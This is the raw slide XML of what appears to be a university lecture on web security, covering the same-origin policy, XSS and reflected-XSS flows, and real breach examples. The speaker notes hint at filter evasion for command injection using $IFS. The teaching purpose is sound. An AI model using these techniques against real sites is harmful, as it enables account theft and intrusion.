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8" r:id="rId3"/>
    <p:sldId id="334" r:id="rId4"/>
    <p:sldId id="284" r:id="rId5"/>
    <p:sldId id="285" r:id="rId6"/>
    <p:sldId id="310" r:id="rId7"/>
    <p:sldId id="311" r:id="rId8"/>
    <p:sldId id="287" r:id="rId9"/>
    <p:sldId id="288" r:id="rId10"/>
    <p:sldId id="337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338" r:id="rId22"/>
    <p:sldId id="313" r:id="rId23"/>
    <p:sldId id="314" r:id="rId24"/>
    <p:sldId id="315" r:id="rId25"/>
    <p:sldId id="316" r:id="rId26"/>
    <p:sldId id="317" r:id="rId27"/>
    <p:sldId id="31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0007"/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79" autoAdjust="0"/>
    <p:restoredTop sz="75690" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="104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150906483911734"/>
          <c:y val="2.8645833333333332E-2"/>
          <c:w val="0.65382655293088365"/>
          <c:h val="0.900798474409448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>
                <a:tint val="54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SQL Injection </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Request Forgery (CSRF)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Web Server Vulnerabilities</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Cross Site Scripting (XSS)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Session Management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28</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>24</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>33</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>62</c:v>
                </c:pt>
                <c:pt idx="4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A4-C343-BE27-D654DF7B5F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SQL Injection </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Request Forgery (CSRF)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Web Server Vulnerabilities</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Cross Site Scripting (XSS)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Session Management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29</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>23</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>31</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>68</c:v>
                </c:pt>
                <c:pt idx="4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A4-C343-BE27-D654DF7B5F5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SQL Injection </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Request Forgery (CSRF)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Web Server Vulnerabilities</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Cross Site Scripting (XSS)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Session Management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14</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>41</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>51</c:v>
                </c:pt>
                <c:pt idx="4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A4-C343-BE27-D654DF7B5F5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SQL Injection </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Request Forgery (CSRF)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Web Server Vulnerabilities</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Cross Site Scripting (XSS)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Session Management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1.8</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>18.8</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>25.3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>27</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>77.2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BA4-C343-BE27-D654DF7B5F5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>
                <a:shade val="53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SQL Injection </c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Cross Site Request Forgery (CSRF)</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Web Server Vulnerabilities</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Cross Site Scripting (XSS)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>Session Management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8</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>11.8</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>24.6</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>21</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>85.9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BA4-C343-BE27-D654DF7B5F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8443343"/>
        <c:axId val="2115054031"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="21184433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5054031"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="21150540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84433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336674929522701"/>
          <c:y val="0.48674233103674541"/>
          <c:w val="0.11898725800300604"/>
          <c:h val="0.42372252296587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12/10/18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12/10/18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78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course website w/ web inspector + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark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39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www.cvedetails.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vulnerabilities-by-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>types.php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96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https://www2.trustwave.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/815-RFM-693/images/2016%20Trustwave%20Global%20Security%20Report.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www2.trustwave.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/815-RFM-693/images/Trustwave_2018-GSR_20180329_Interactive.pdf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14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minesweeper in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript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1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scripts can be imported from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> remote origins, have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>privilieges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of imported page (not source)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7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Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> worm (2005):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yahoo mail (2016): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nakedsecurity.sophos.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/2016/01/21/xss-bug-in-yahoo-mail-could-have-let-attackers-take-over-email-accounts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2017):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malicious sellers added scripts to legitimate product listings to redirect users to a spoofed login page that harvested credentials before redirecting users back to a legitimate eBay page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>news.netcraft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expandable ads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (2018): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>threatpost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/once-popular-online-ad-format-opens-top-tier-sites-to-xss-attacks/137681/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Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2018): create admin account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.bleepingcomputer.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/news/security/active-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-targeting-amp-for-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-plugin/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4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| is pipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$IFS is environment variable for inter-command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>separater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (by default, space), $9 is ninth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (always empty string)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11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12/10/18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12/10/18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12/10/18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12/10/18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12/10/18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85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12/10/18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6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12/10/18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ysClr val="windowText" lastClr="000000"/>
              </a:gs>
              <a:gs pos="80000">
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:sysClr>
              </a:gs>
              <a:gs pos="100000">
                <a:sysClr val="windowText" lastClr="000000">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:sysClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="13500000" scaled="1"/>
            <a:tileRect/>
          </a:gra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12/10/18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4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12/10/18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12/10/18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4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12/10/18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7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7F0007">
                  <a:alpha val="67059"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent6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12/10/18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/>
              <a:t>CS 181S		       		     December 10, 2018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2"/>
            <a:ext cx="7848600" cy="631825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3400" dirty="0"/>
              <a:t>Lecture 23: Web Security (cont'd)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3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E0BB9-5223-C84A-BA02-08BD8C929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Web Pages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BD3DE9-3441-4C4B-9898-EE90AD3CDF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Server-Side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9F7526-DA63-844E-A3E0-3AEDB77593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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Go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6ADDAF-3227-A943-99A0-2AE80F4ACA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Client-Side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C1CE70F-3326-B748-B8A8-84EC08B82C9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/>
              <a:t>Javascript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072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Same Origin Policy (SOP)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Data for http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>page.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> accessed by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page2.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/page3.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com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dir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page.html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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:81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dir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page.html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http://www.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.html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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.com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dir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page.html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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com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dir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page.html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174" y="2094807"/>
            <a:ext cx="394960" cy="3635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672" y="2905005"/>
            <a:ext cx="394481" cy="4659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965" y="2534550"/>
            <a:ext cx="395835" cy="3643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298" y="3327430"/>
            <a:ext cx="394481" cy="4659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444" y="4294477"/>
            <a:ext cx="394481" cy="4659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298" y="4700821"/>
            <a:ext cx="377856" cy="44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8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SOP Exceptions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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain relaxation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin network requests: Access-Control-Allow-Origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-origin client-side communication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Importing scripts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08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Cross-Site Scripting (XSS)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 of code injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sends victim a script that runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com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59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Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 18" descr="toshiba_satellite_a105_s4284_lap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754313"/>
            <a:ext cx="1436688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CompaqAlphaServerES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9475" y="5132388"/>
            <a:ext cx="1155700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S15serverfro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4188" y="2057400"/>
            <a:ext cx="2436812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943600" y="1676400"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server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562600" y="4705350"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim Server </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="2073275"/>
            <a:ext cx="3211512" cy="6873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0" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2455863"/>
            <a:ext cx="3440112" cy="773112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1" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2589213" y="2422525"/>
            <a:ext cx="2576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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="4114800"/>
            <a:ext cx="2830512" cy="990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3" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4222750"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4673600"/>
            <a:ext cx="2638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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2101850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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a: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2209800" y="2759075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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a: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 rot="1068865">
            <a:off x="2714625" y="3857625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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4476750"/>
            <a:ext cx="3352800" cy="116205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19" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="3046413"/>
            <a:ext cx="3211512" cy="68738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0" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2901950"/>
            <a:ext cx="2305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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3200400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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="4159250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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2970213" y="1873200"/>
            <a:ext cx="1654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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>visit web site</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843833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Reflected XSS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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search field on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php?term</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>search.php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sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   &lt;html&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      &lt;title&gt; Search Results &lt;/title&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
